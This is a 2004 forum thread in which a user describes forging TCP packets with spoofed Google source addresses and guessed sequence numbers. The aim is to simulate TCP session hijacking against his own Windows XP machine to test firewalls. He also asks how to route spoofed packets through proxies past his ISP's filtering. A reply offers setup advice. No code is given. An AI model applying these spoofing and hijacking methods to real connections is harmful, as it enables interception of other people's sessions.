August 31st, 2004, 10:29 AM
I am facing the followin problem……..
This is the situation.
I am using a packet generator from my Linux box in order to attack my windows box.
It seems that when the packet generator sends packets with my real IP they reach at my windows XP box and the sniffer software logs them and I can analyze them.
It seems though that when I sent forged packets they do not reach my windows XP box.
Assumption 1) my guess is that my ISP (Pipex UK) does not allow forged packets
Assumption 2) I can use a proxy server in order to try and attack my windows XP box
How would that take place?
In the information I have read so far there is no explanation or inadequate explanation on how to make a program other than a web browser to connect to a proxy and things are even worse when it comes to Linux programs.
How will I establish communication with my proxy using my real IP since my ISP will not allow otherwise, and then ask/command it to send the forged packets? Could tunneling be the answer? There must be a simpler way…
Assumption 3) also since a proxy will connect to my windows box with its own IP I think I am in need of a transparent proxy.
Is it possible that there is a much simpler way and I am overcomplicating things? (Setting up a network between the two boxes is not an option since it will give wrong results to my experiments) .By the way I am trying to simulate a non-blind/blind TCP hijacking attack.
P.S does this post belong here?
August 31st, 2004, 10:46 AM
so hows that work then? you have 2 computers plugged into one phone line? wont they both have the same IP? might be me being dumb i dunno...
does the checksum check out? why will setting up a nework give you the wrong results? it would make it allot simpler and also by saying what youve said it makes it sound like your up to something else, but im not gonna judge what your up to.
what port are your packets being forged on and whats the intention of forging packets? to make them appear from someone else?
give use some more info, specifics - whjats your trying to do, type of attack, port, protocol...
August 31st, 2004, 04:32 PM
True it needs clarification what I am doing. I am afraid though that someone on my UNI advised that it couldn’t be done the way I have it my mind but I will still try just in case someone here has a different opinion and maybe a bight more skills than the person that advised me.
Here it goes.
My objective is to test a number of commercial firewalls on how vulnerable they are against attacks. Objective is not only how the firewall will behave when you have adjusted it, but also how it will behave with out of the box configurations. This last one basically means that I am not able to put them on a network since firewalls have what is called a trusted zone (when in a Network) and this has less security in out of the box configurations.
I have one phone line with a microfilter, which basically allows me to have both a phone and ADSL connection.
Box A: Attacker -----is running Linux is connect with an ADSL modem with PIPEX as ISP (I am in UK) and I am running a packet generator named IP Sorcery.
Box B: Target----- is running Windows XP and is connected with a 56Kmodem also I have a sniffer software running on named NGSniff. I would run ethereal but I could not make it work with PPP protocol but that is another story.
The experiment goes like this: I connect Box B to Google .I analyse with the sniffer the packets I am getting. Especially sequence, acknowledgement numbers of the TCP packet.
I am trying with the Box A to forge packets that seem to have come from Google (I put as source address the Google address from the logs in the sniffer of the first box), in addition I put sequence and acknowledgement that would look like they came from the connection that Box B has with Google.
Essentially I am trying to pass packets to port 80 of BOX B(I am not sure though if box B accepts packets in port 80 or another Port but from the analyser it seems that I pass packets to port 80 of Google but Google connects to Box B to another port 1280,1253 or something, I Have tried those ports as well), I don’t know about the checksum haven’t wondered about it since now. I think that the generator automatically takes care of that field.
Here the experiment fails since my ISP does not allow the sending of forged packets.
If it would go through and I would manage to pass my self as Google I would install a firewall and try again to see if it would work.
Now since the way the TCP/IP stacks and the generation of random numbers works in current O/S it is almost impossible to perform a blind Hijacking attack. But since theoretically this attack can be done my test would prove that firewalls are bypassed if this attack occurs.
This is when my idea of Proxies came but I do not seem viable.
P.S Do I still sound Dodgy?
Thanks i2c ,hope you ll give your opinion on the subject
August 31st, 2004, 04:41 PM
-- Make sure a firewall isn't running so that no interruption occurs and packet's move between machines freely.
-- Same in the event you have a router or anything like a router (hardware firewall, etc). I didn't fully read your post to see if you have a router, but if you do you might want to disconnect for this experiment. This is for best results.
-- Make sure system resources on both machines can handle the amount of packets your going to send, the type of packets, size, etc.
-- Notify your ISP and alert them that you are doing an experiment on both machines (provide them with the systems IP address so they know which are being used) so when they detect/see suspicious activity, they won't freak out.
-- In order for packets from Box A to go to Box B's port 80, the port needs to be opened. This means a webserver of sorts needs to be running.
-- As far as I know, that whole "Google Connecting/Connection" hijack type thing doesn't always work to the full extent. You sometimes get your own IP traced back to you. Perform a ping to your other box once connected and see which IP you get, yours or googles.
Hope I helped ya out a little bit..